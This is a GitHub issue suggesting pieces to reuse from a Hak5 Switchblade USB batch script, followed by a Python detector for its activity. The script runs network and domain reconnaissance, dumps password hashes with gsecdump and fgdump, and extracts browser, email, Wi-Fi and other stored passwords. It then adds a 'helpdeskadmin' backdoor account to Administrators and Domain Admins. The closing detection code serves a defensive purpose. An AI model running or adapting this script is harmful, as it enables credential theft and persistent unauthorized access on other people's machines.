Cherry pick the "good" stuff out of the old Hak5 Switchblade commands #54

Open
mubix opened this issue Nov 11, 2013 · 0 comments
mubix commented Nov 11, 2013


Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html




::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump\%computername% md \switchblade\dump\%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  ipconfig /all >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  route print >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  ipconfig /displaydns >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netstat -anbv >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh diag show all /v >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh firewall show conf >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  netsh firewall show port >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  arp -a >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
  net session >> \switchblade\dump\%computername%\%computername%-net.log 2>&1
::user info creation
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net view >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net share >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net accounts >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net localgroup administrators /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "domain admins" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "backup operators" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  net group "domain users" /domain >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  gpresult >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  .\whosthere.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
  .\whosthere-alt.exe >> \switchblade\dump\%computername%\%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump\%computername%\%computername%-user 2>&1
::dump other PC info
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  net start >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  set >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
  tree /f >> \switchblade\dump\%computername%\%computername%-PC.log 2>&1
::slurp Browser info
  echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
  cscript //nologo .\iehistquick.vbs >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
echo ***********[End Of File]************ >> \switchblade\dump\%computername%\%computername%_browser.log 2>&1
::create the  nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump\%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump\~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump\~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump\~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump\~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump\~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump\~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump\~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump\~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump\~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump\~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump\~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump\~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump\~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump\~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump\~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump\~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump\~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump\~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump\~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump\~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit
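
From the defender's side, a script like the one above leaves a recognisable trail in process-creation logs: a burst of built-in discovery commands, then a new account added to privileged groups. The following is an added example, not part of the original issue or of the project's code. The event tuples, the `<password>` placeholder, the 10-minute window and the threshold of five are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (host, time, command line), shaped like
# the fields Sysmon Event ID 1 or Security 4688 provide. Not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", "2013-11-11T10:00:01", "ipconfig /all"),
    ("WS01", "2013-11-11T10:00:02", "route print"),
    ("WS01", "2013-11-11T10:00:03", "netstat -anbv"),
    ("WS01", "2013-11-11T10:00:04", "arp -a"),
    ("WS01", "2013-11-11T10:00:05", "net view"),
    ("WS01", "2013-11-11T10:00:06", 'net group "domain admins" /domain'),
    ("WS01", "2013-11-11T10:01:30", "net user helpdeskadmin <password> /add"),
    ("WS01", "2013-11-11T10:01:31", "net localgroup Administrators helpdeskadmin /add"),
    ("WS01", "2013-11-11T10:01:32", 'net group "domain admins" helpdeskadmin /add'),
    ("WS02", "2013-11-11T10:05:00", "ipconfig /all"),
    ("WS02", "2013-11-11T10:05:09", "ping 10.0.0.1"),
]

DISCOVERY = [re.compile(p, re.I) for p in (
    r"^ipconfig\s+/(all|displaydns)", r"^route\s+print", r"^netstat\s+-\w*a",
    r"^arp\s+-a", r"^net1?\s+(view|share|session|accounts|start)\b",
    r"^net1?\s+(local)?group\b(?!.*/add)", r"^gpresult\b", r"^netsh\s+firewall\s+show",
)]
ACCOUNT_ADD = re.compile(r"^net1?\s+user\s+\S+.*\s/add\b", re.I)
GROUP_ADD = re.compile(r'^net1?\s+(local)?group\s+("[^"]+"|\S+)\s+\S+.*\s/add\b', re.I)

def detect(events, window=timedelta(minutes=10), min_discovery=5):
    """Return {host: [(finding, detail), ...]} for hosts matching the pattern."""
    per_host = {}
    for host, ts, cmd in events:
        per_host.setdefault(host, []).append((datetime.fromisoformat(ts), cmd.strip()))
    alerts = {}
    for host, rows in per_host.items():
        rows.sort()
        findings = []
        hits = [t for t, c in rows if any(p.search(c) for p in DISCOVERY)]
        # Largest number of discovery commands inside any single time window.
        burst = max((sum(t - s <= window for t in hits[i:]) for i, s in enumerate(hits)), default=0)
        if burst >= min_discovery:
            findings.append(("discovery_burst", burst))
        for _, c in rows:
            if ACCOUNT_ADD.search(c):
                findings.append(("account_created", c))
            elif GROUP_ADD.search(c):
                findings.append(("group_member_added", c))
        if findings:
            alerts[host] = findings
    return alerts
```

A single `ipconfig /all` on its own (WS02 in the sample) stays below the threshold, which is what keeps the burst rule usable on hosts where administrators run these commands routinely.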